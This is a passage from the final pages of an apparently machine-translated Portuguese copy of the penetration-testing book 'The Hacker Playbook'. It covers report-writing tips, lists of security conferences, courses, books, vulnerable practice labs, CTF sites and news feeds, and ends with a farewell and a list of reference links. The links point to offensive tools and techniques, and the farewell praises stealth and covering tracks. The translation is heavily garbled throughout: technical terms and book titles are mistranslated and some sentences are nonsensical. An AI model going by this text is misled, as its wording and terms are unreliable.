o Se você usar uma ferramenta para comprometer uma rede, você tem que ter uma solução para pará­lo.
o Se você não tem uma solução, ajudar o cliente a desenvolver uma estratégia de mitigação.
Não mis de taxa de seguro Bandeira / HTTP Somente resultados se eles não são questões
o Existem alguns biscoitos que não são usados ​​para tokens de sessão e não podem fornecer um atacante
com qualquer superfície de ataque adicional. Embora estes ainda deve ser relatado, eles devem estar em
uma classificação muito mais baixa do que aqueles usados ​​para rastrear o estado da sessão.
o Este é apenas um exemplo para reforçar a idéia de fazer­se de compreender corretamente
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 110/115
vulnerabilidades.
Faça vulnerabilidades certeza são vulnerabilidades reais
o que eu não sei quantas vezes eu já recebeu os resultados de teste de penetração me dizendo que meus sistemas
tinha PHP explora em cima delas. Isto é porque o scanner, com base na versão, alertado de
Estes achados críticos. Algumas das conclusões afirmam que eles são questões CGI PHP ou um Apache
questões de segurança modernos. O problema é meus servidores não são executados os scripts CGI, mas o scanner
identificou o problema apenas exclusivamente com base no controle de versão. Por favor, certifique­se de validar que
achados são resultados reais.
A última coisa que eu quero terminar esta seção é para certificar­se de obter feedback de seus clientes. Gráficos
são grandes para a gestão, mas os caras técnicos querem ver muitos passos e procedimentos sobre como
repetir as façanhas. É importante também entregar o seu cliente todos os resultados da verificação matérias, resultados Burp cru,
e, geralmente, eu gostaria de fornecer um arquivo do Excel com uma simples lista de resultados e vulnerabilidades. o
arquivo Excel torna muito fácil para uma equipe de TI a verificar a que conclusões foram corrigidos e que
outros ainda são válidos.
Se você quer se diferenciar de outros pentesters, e tentar encontrar maneiras de separar­se de
todos os outros. Se você estiver fazendo um PT para uma grande empresa, você também pode fornecer uma OSINT simples (Open
Fonte Intelligence) relatório descrevendo o que e quem pode ser encontrado publicamente na Internet.
Uma das perguntas mais frequentes são "Para onde eu vou daqui?" Como eu sempre chegar
mais forte na indústria de segurança e como posso melhorar? Então, eu levei uma facada em tentar dar aos leitores uma lista
de algumas dessas opções. Eu quebrei essa área para baixo em grandes conferências para participar, de formação
cursos para ajudar a sua evolução, ambos os livros técnicos e não técnicos para ler, vulnerável
frameworks, capturar os eventos bandeira, e mantendo­se com a notícia.
Comecei com indo para grandes conferências de segurança (contras), como é um ótimo lugar para conhecer pessoas e para
aprender sobre o que está acontecendo na indústria. Há tantos contras diferentes para participar e você
pode encontrar uma lista mais completa aqui no InfoSecEvents: http://bit.ly/1cVISnz.I'll dar­lhe uma pequena amostra
dos contras que eu recomendo e uma pequena sinopse sobre cada um deles.
Os contras que eu recomendo a partir de minha própria experiência pessoal:
DefCon (http://www.defcon.org/) ­ Em Las Vegas e menos de $ 200. Esta é a maior hackers
conferência e é uma obrigação.
DerbyCon (https://www.derbycon.com/) ­ Em Kentucky e menos de $ 200. Algumas das minhas palestras favoritos
vêm de DerbyCon.
BlackHat (http://www.blackhat.com/) ­ Em Las Vegas e extremamente caro. Grandes oradores e
mais orientados para os funcionários de empresas.
Bsides (http://www.securitybsides.com/) ­ geralmente livre. Há bsides conferências em todo o
país. Encontre a sua!
ToorCon (http://toorcon.net/) ­ Em San Diego e este é um desses pequenos contras onde você encontra um
monte de gente nova e todo mundo é muito amigável.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 111/115
CANSEC (http://cansecwest.com/) ­ Eu só estive a CanSecWest, definitivamente caro, mas sempre teve
boas palestras técnicas.
Shmoocon (http://www.shmoocon.org/) ­ Uma das maiores conferências sobre a costa leste e ao abrigo
$ 200. Uma das minhas conferênciasfavoritas.
OWASP AppSec (https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference) ­
conferências baratos e divertidos focado em segurança de aplicações web. O custo é de US $ 100 se você é um
membro do OWASP.
Lethal (http://www.meetup.com/LETHAL/) ­ É claro que eu tinha que ligar o meu grupo. Embora não seja um
conferência, temos encontros mensais onde temos apresentadores. Não só é livre, mas também a
grupo é pequeno, assim você pode se envolver e reunir­se com outras pessoas com interesses semelhantes aos seus.
Se você está procurando o JumpStart em um campo particular na segurança, você se beneficiará muito provavelmente a partir de um
curso de treinamento. Uma vez que existem tantos diferentes cursos de formação para ir, aqui estão algumas
recomendações:
BlackHat ­ Extremamente caro, mas não só eles têm um monte de cursos diferentes, mas são
ensinado por alguns dos melhores.
DerbyCon ­ Bem preços treinamento em Kentucky e ocorre durante a conferência.
SANS (http://www.sans.org) ­ formação extremamente caros, mas eles são o padrão da indústria.
Segurança ofensiva (http://www.offensive­security.com/) ­ Bem razoáveis ​​e eu recomendo
tomar os cursos online Offensive Security. Você ganha um monte de grandes hands­on experiência, mas você
tem que investir muito tempo nele.
Há muitos bons livros adicionais para ler. Eu não posso enumerá­los todos, mas aqui estão alguns que se destacam a
me ­ em nenhuma ordem particular. Agora você deve estar se perguntando, por que eu me preocupo com livros como malware
análise? A resposta simples é que os diferentes campos de segurança (análise forense, análise de malware, incidente
resposta, pentestings) se entrelaçam. Para ser um bom testador de penetração, você tem que conhecê­los todos. Vocês
tem que saber como remover as suas faixas, o que poderia impedi­lo de explorar uma caixa, e como o
caras defensivas pensar.
Reading técnico:
Manual do Hacker Aplicação Web 2
Guia do Metasploit a penetração Tester
Chapéu cinzento Hacking
SQL Injection: Ataque e Defesa
Hacking: The Art of Exploitation
Hacking Exposed (All)
Malware Analista Cookbook
de Shellcoder Handbook 2nd Edition
A Bug Diário de Hunter
Fun Segurança Leitura relacionada:
jogo de Enders
Cryptonomicon
Bater neve
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 112/115
Ovo do cuco
Como Roubar uma rede (série)
Dissecando o hack: a rede f0rb1dd3n
O silêncio no fio
Subterrâneo
Daemon de Daniel Suarez
chefe
Quer ficar melhor em seu próprio país? Embora eu não tenha tentado todos estes quadros, baixá­los,
spin­los para cima, e deixe­me saber como eles são. É grande prática!
Ofensivo Metasploitable Segurança
OWASP WebGoat / Vicnum / InsecureWebApp
Maven Segurança WebMaven / Buggy Banco
Google Gruyere (antigo Codelab / Jalsberg)
NTNU Jogo Hacme
SPI Dynamics SPI Dynamics
DVWA Web Application Droga Vulnerável
Ferro Geek Mutillidae
O Projeto de Segurança da borboleta A borboleta de Segurança
McAfee Hacme Casino / HacmeBank / Viagens / Shipping
Bonsai Sec Moth
Stanford SecuriBench
Enigma Grupo EnigmaGroup
X5s XSS Skills Codificação
A loja Bodgeit
MadIrish LampSecurity
WackoPicko
Droga DVL Linux Vulnerável
Pynstrom Holynix
Se você pretende fazer desta a sua profissão ou mesmo se você fizer isso por diversão, você realmente precisa de se envolver
com diferentes desafios CTF. Tente encontrar alguns amigos ou talvez encontrar o seu grupo de segurança local para
tente estes desafios. Não só irá testar sua habilidade e compreensão dos ataques, mas também você vai
ser capaz de conectar­se melhor com as pessoas na indústria. Passar 3 dias e noites fazendo um desafio é
provavelmente uma das coisas mais gratificantes, que você pode experimentar.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 113/115
Vá visitar https://ctftime.org/ e encontrar onde e quando os próximos CTFs são. Se você está no Los Angeles
região, pare no www.meetup.com/lethal e juntar­se uma de nossas equipes!
A segurança é um campo em rápida mutação e é importante manter­se atualizado com as mudanças e
evoluindo mundo. Aqui estão algumas listas I verificar a cada manhã ou e­mail listas que recebo no dia a dia
base.
RSS Lista de alimentação / Site:
http://securepla.net/rss.php ­ Este é o meu pessoal RSS feed de eu ter compilado ao longo dos anos. I
recomendo que você verifique este link para fora.
https://code.google.com/p/pentest­bookmarks/wiki/BookmarksList
Listas de e­mail:
https://www.schneier.com/crypto­gram.html
http://www.team­cymru.org/News/
https://www.infragard.org/
http://www.thecyberwire.com/
Listas do Twitter:
https://twitter.com/danothebeach/lists/infosec
http://www.marblesecurity.com/2013/11/20/100­security­experts­follow­twitter/
Se você chegou até aqui, isso significa que você pertence completamente a rede, rachado todos os
senhas, e conseguiu sair limpo. Agora é hora de tomar tudo o que você aprendeu e construir em cima dela.
Minha maior recomendação para você é que você se envolveu com os seus grupos de segurança locais ou
participar em conferências de segurança. Você também pode começar um blog e começar a jogar com estes diferentes
ferramentas. Saiba o que funciona eo que não e como você pode fazer ataques mais eficiente e ser
silenciosa na rede. Vai levar algum tempo fora do seu trabalho 9­5 normal, mas vai ser definitivamente vale a pena.
Espero que você encontrou The Hacker Playbook ser informativo e que você aprendeu um par novo
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 114/115
ferramentas ou técnicas. A segurança é sempre a mudar e é importante manter­se com as tendências eaplicar sua própria criatividade. Não posso dizer que há sempre um momento em que você pode dizer que você já domina a segurança,
mas uma vez que você tenha obtido o básico para baixo pat, os ataques de alto nível não realmente mudar.
Se você não encontrar neste livro para ser útil, me deixe um comentário no site do livro e ele vai me ajudar a tentar
para desenvolver melhores conteúdos e tentar entender o que você está procurando. Se eu esqueci de mencionar
alguém neste livro ou eu mis­falou sobre um tema, peço desculpas e irá atualizar o site para este livro
com esta informação.
Contate­me:
Twitter:HackerPlaybook
URL: TheHackerPlaybook.com
Há tantas pessoas / grupos que eu gostaria de agradecer e me desculpe se a sua falta. Alguns de vocês podem não
me conhece, mas a sua investigação, ferramentas e teorias têm me inspirou a se tornar um melhor testador de penetração
e me ajudou a escrever este livro. Assim, em nenhuma ordem particular:
1 http://mashable.com/2013/12/09/anonymous­attack­fine/
2 http://krebsonsecurity.com/2013/10/adobe­breach­impacted­at­least­38­million­users/
3 https://community.rapid7.com/community/infosec/sonar/blog/2013/10/30/project­sonar­one­month­later
4 http://pauldotcom.com/wiki/index.php/Episode291
5 http://www.offensive­security.com/metasploit­unleashed/Building_A_Module
6 http://www.exploit­db.com/exploits/27277/
7 http://msdn.microsoft.com/en­us/library/2c15cbf0­f086­4c74­8b70­1f2fa45dd4be.aspx
8 http://pastebin.com/TE3fvhEh
9 http://www.trustedsec.com/files/BSIDESLV_Secret_Pentesting_Techniques.pdf
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 115/115
10 http://esec­pentest.sogeti.com/exploiting­windows­2008­group­policy­preferences11 http://www.ampliasecurity.com/research/wcefaq.html
12 http://www.room362.com/blog/2011/9/6/post­exploitation­command­lists.html
13 http://www.irongeek.com/i.php?page=videos/derbycon3/s106­owning­computers­without­shell­access­royce­davis
14 http://www.defcon.org/images/defcon­21/dc­21­presentations/Milam/DEFCON­21­Milam­Getting­The­Goods­With­smbexec­
Updated.pdf
15 https://github.com/brav0hax/smbexec
16 https://raw.github.com/obscuresec/random/master/StartListener.py
17 http://www.pentestgeek.com/2013/09/18/invoke­shellcode/
18 http://www.irongeek.com/i.php?page=videos/derbycon3/1209­living­off­the­land­a­minimalist­s­guide­to­windows­post­
exploração­christopher­campbell­matthew­Graeber
19 http://www.labofapenetrationtester.com/2012/08/introducing­nishang­pow­ereshell­for.html
20 https://www.jessecole.org/2011/12/03/ssh­password­logging/
21 https://www.securepla.net/doppelganging­your­ssh­server/
22 https://github.com/obscuresec/shmoocon/blob/master/PowerShellOfficeMacro
23 https://bbs.archlinux.org/viewtopic.php?id=51548
24 http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
25 http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
26 http://en.wikipedia.org/wiki/Wi­Fi_Protected_Setup
27 http://www.kb.cert.org/vuls/id/723755
28 http://www.willhackforsushi.com/?page_id=37
29 http://www.youtube.com/watch?v=8BiOPBsXh0g#t=163
30 http://blog.thireus.com/cracking­story­how­i­cracked­over­122­million­sha1­and­md5­hashed­passwords
31 http://contest­2010.korelogic.com/rules.html
32 http://www.trustedsec.com/december­2010/bypass­windows­uac/
33 http://wiki.tekkies.co.uk/General_Technical#FTP_using_xp_cmdshell_­_sql2k
34 http://www.rootkitanalytics.com/userland/Exploring­Alternate­Data­Streams.php
35 http://www.youtube.com/watch?v=U34PpkZ5cQ8
36 http://www.irongeek.com/i.php?page=videos/derbycon3/4206­windows­0wn3d­by­default­mark­baggett
37 http://www.offensive­security.com/offsec/penetration­test­report­2013/